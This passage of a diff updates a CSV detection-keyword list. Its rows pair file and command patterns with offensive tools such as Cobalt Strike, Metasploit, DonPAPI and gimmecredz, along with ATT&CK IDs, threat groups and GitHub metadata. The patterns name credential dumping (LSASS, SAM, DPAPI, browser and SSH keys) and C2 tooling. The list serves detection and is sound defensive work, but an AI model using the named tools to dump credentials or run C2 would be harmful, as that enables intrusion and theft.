scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*drop_malleable_without_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*drop_malleable_unknown_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*drop_malleable_with_invalid_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*drop_malleable_without_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*dropboxC2.py*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dropper_cs.exe*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" 
"*dropper32.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*dropper64.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*drunkpotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*drunkpotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*drupal_enum.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*drunkpotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*drunkpotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*drupal_enum.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*drupwn --mode exploit --target *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Drupwn*","offensive_tool_keyword","Drupwn","Drupal Security Scanner to perform enumerations on Drupal-based web applications.","T1190 - T1195 - T1200 - T1210 - T1211 - T1212 - T1213 - T1221 - T1222","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/immunIT/drupwn","1","0","N/A","N/A","6","543","132","2020-11-04T13:43:29Z","2018-04-04T15:13:27Z" "*dswmiexec.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 
TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" 
@@ -9646,14 +9794,14 @@
 "*Dubmoat_ExtractData*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z"
 "*Dubmoat_PrintFilename*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z"
 "*Dubmoat_TruncateFile*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z"
-"*DueDLLigence.cs*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","441","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z"
-"*DueDLLigence.sln*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","441","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z"
-"*DueDLLigence-master*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","441","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*DueDLLigence.cs*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*DueDLLigence.sln*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*DueDLLigence-master*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*dump_chrome_user*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. 
and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" -"*dump_CREDENTIAL_MSOFFICE*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*dump_CREDENTIAL_TASKSCHEDULER*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*dump_CREDENTIAL_TSE*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*dump_domain*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*dump_CREDENTIAL_MSOFFICE*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_CREDENTIAL_TASKSCHEDULER*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential 
Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_CREDENTIAL_TSE*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_domain*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*dump_firefox_user*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_jenkins*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_keepassx*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" 
@@ -9661,12 +9809,12 @@ "*dump_lsass.js*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*dump_process(*lsass.exe*)*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*dump_sam(*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*dump_secrets.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*dump_secrets.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*dump_ssh_keys*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. 
config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_tomcat*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" -"*dump_VAULT_INTERNET_EXPLORER*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*dump_VAULT_NGC_LOCAL_ACCOOUNT*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*dump_VAULT_WIN_BIO_KEY*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_VAULT_INTERNET_EXPLORER*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_VAULT_NGC_LOCAL_ACCOOUNT*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - 
T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_VAULT_WIN_BIO_KEY*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*dump_webconf*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_webpass*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_wifi_wpa_*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" 
